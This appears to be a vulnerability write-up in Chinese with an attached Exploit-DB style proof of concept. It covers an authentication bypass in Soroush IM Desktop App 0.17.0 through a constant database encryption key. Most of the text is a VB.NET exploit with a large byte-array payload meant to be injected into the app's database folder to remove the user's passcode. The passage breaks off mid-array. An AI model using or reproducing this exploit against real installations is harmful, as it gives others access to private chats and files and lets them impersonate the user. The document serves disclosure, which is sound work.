Soroush IM Desktop App 0.17.0 - 认证绕过 漏洞概述 Soroush IM Desktop App 0.17.0 存在认证绕过漏洞。该漏洞源于数据库加密机制缺陷:所有数据库使用固定密钥加密,导致在不同 PC 上生成的数据库文件相同。攻击者可通过数据库注入技术,将恶意数据库文件替换到目标系统的日志文件夹中,从而绕过客户端认证过程。 影响范围 受影响系统:Linux、macOS 和 Windows 系统 受影响版本:Soroush IM Desktop App 0.17.0 BETA 测试环境:Windows 10 1803、Windows Server 2016 14393 安全风险: 1. 攻击者可访问所有数据、聊天、图片、文件等,并能够以原用户身份发送和接收数据 2. 攻击者可利用此漏洞执行拒绝服务攻击(通过设置新密码而无需知道原密码) 修复方案 页面未提供具体修复方案 建议联系厂商更新软件版本 利用代码 (POC) ```vb Exploit Title: Soroush IM Desktop App 0.17.0 - Authentication Bypass Date: 2018-08-08 Exploit Author: VortexNeoX64 Vendor Homepage: https://soroush-app.ir Software Link: http://54.36.43.176/SoroushSetup0.17.0.exe Version: 0.17.0 BETA Tested on: Windows 10 1803 and windows server 2016 14393 Security Issue: It seems that all databases are encrypted with a constant key and then producing same output across every other PCs so pushing NO PASSCODE data that was encrypted before, to the databases on any other PC, would process the database valid and remove the passcode. The database entriesd are first entered in a log file in the same folder of the database, and then the Soroush app pushes the log file into permanent database. Attacker can unlock the client app with database injection, and bypass the authentication process. This exploit leads to two important security risks: 1. Attacker can access to all the data, chats, images, files and etc. then he/she is able to send and receive data on behalf of the original user 2. Attacker then may use the exploit to perform a DOS attack, which is done by setting a new passcode for the client without knowing the previews passcode PoC (.NET 4.0 Visual Basic) PoC dose not support Windows XP, try change "\users\" to "\Documents and Settings\" Module Module1 Sub Main() Console.WriteLine("* [Soroush IM Local Passcode bypass via database injection] ") Console.WriteLine(" [Developed by [VortexNeoX64] 2018] ") Console.WriteLine(" [Tested on Windows 10 1803 and windows server 2016 14393 . Soroush version = 0.17.0 BETA] ") Console.WriteLine(" [Affected systems: probably Linux, MacOS and for sure Windows] ") Console.WriteLine(" [Vulnerability type: Local & Privilege Escalation [Passcode bypass]] ") Console.WriteLine(" [Press any Key to exploit...] *") Console.ReadKey() Dim _temp As Byte() = {237, 4, 235, 105, 158, 3, 1, 16, 0, 0, 0, 6, 0, 0, 1, 0, 6, 0, 1, 88, 97, 81, 122, 79, 114, 86, 89, 53, 79, 111, 73, 79, 77, 90, 49, 52, 102, 83, 101, 122, 80, 113, 121, 122, 88, 49, 78, 65, 108, 56, 52, 116, 112, 87, 75, 77, 117, 115, 122, 117, 109, 72, 101, 116, 51, 43, 54, 122, 106, 55, 117, 108, 74, 66, 47, 99, 101, 118, 97, 113, 107, 94, 111, 74, 66, 52, 118, 53, 74, 120, 75, 47, 114, 122, 57, 122, 73, 53, 116, 43, 76, 122, 68, 116, 86, 81, 61, 61, 182, 6, 123, 34, 108, 97, 116, 97, 34, 58, 34, 57, 105, 105, 116, 76, 114, 118, 88, 76, 98, 99, 66, 67, 74, 52, 87, 102, 68, 55, 106, 66, 82, 72, 109, 110, 113, 66, 57, 118, 82, 89, 90, 81, 54, 85, 49, 113, 78, 126, 75, 55, 57, 98, 106, 85, 106, 109, 74, 102, 122, 105, 67, 111, 65, 100, 114, 99, 98, 82, 119, 54, 43, 75, 68, 72, 47, 108, 85, 82, 90, 77, 119, 73, 103, 70, 115, 57, 75, 112, 115, 57, 97, 49, 69, 47, 77, 104, 72, 51, 51, 114, 80, 83, 81, 113, 99, 117, 49, 89, 87, 101, 49, 83, 75, 98, 103, 78, 84, 72, 113, 89, 82, 87, 71, 73, 43, 88, 111, 85, 105, 69, 55, 72, 120, 121, 120, 57, 50, 90, 116, 116, 43, 81, 75, 100, 103, 114, 67, 77, 120, 122, 65, 66, 60, 50, 117, 85, 87, 68, 119, 67, 113, 68, 105, 53, 67, 111, 86, 69, 108, 77, 43, 113, 90, 106, 118, 75, 109, 66, 99, 112, 120, 99, 47, 110, 80, 84, 67, 55, 117, 111, 116, 86, 115, 89, 50, 89, 55, 88, 89, 49, 88, 52, 78, 69, 52, 106, 105, 110, 71, 120, 67, 87, 118, 118, 106, 107, 80, 51, 85, 114, 75, 48, 51, 100, 67, 114, 71, 85, 75, 119, 88, 70, 48, 85, 101, 73, 50, 79, 108, 97, 84, 67, 100, 49, 97, 77, 43, 119, 83, 80, 111, 99, 110, 105, 66, 66, 97, 67, 48, 56, 82, 118, 97, 120, 75, 56, 88, 55, 84, 89, 111, 54, 88, 67, 100, 85, 104, 83, 111, 75, 109, 69, 66, 106, 105, 52, 120, 75, 48, 98, 65, 87, 100, 83, 71, 49, 69, 83, 110, 67, 66, 117, 114, 76, 71, 70, 75, 53, 73, 111, 81, 49, 74, 115, 79, 105, 74, 100, 119, 53, 89, 116, 116, 69, 103, 70, 103, 55, 86, 104, 81, 56, 76, 75, 75, 106, 69, 103, 53, 74, 72, 50, 66, 117, 84, 47, 79, 90, 65, 77, 111, 57, 88, 115, 88, 108, 105, 77, 121, 108, 66, 120, 88, 102, 70, 119, 79, 67, 74, 78, 120, 53, 108, 51, 118, 48, 68, 104, 84, 51, 76, 75, 106, 69, 103, 55, 86, 84, 115, 79, 80, 65, 121, 118, 54, 90, 98, 113, 118, 82, 51, 67, 118, 109, 66, 86, 57, 108, 52, 114, 70, 120, 71, 50, 52, 108, 113, 66, 70, 70, 101, 115, 105, 120, 88, 102, 74, 122, 100, 90, 69, 111, 68, 100, 84, 120, 104, 84, 120, 67, 109, 116, 88, 67, 65, 110, 80, 67, 65, 120, 104, 84, 120, 67, 109, 116, 88, 67, 65, 110, 80, 67, 65, 120, 104, 84, 120, 67, 109, 116, 88, 67, 65, 110, 80, 67, 65, 120, 104, 84, 120, 67, 109, 116, 88, 67, 65, 110, 80, 67, 65, 120, 104, 84, 120, 67, 109, 116, 88, 67, 65, 110, 80, 67, 65, 120, 104, 84, 120, 67, 109, 116, 88, 67, 65, 110, 8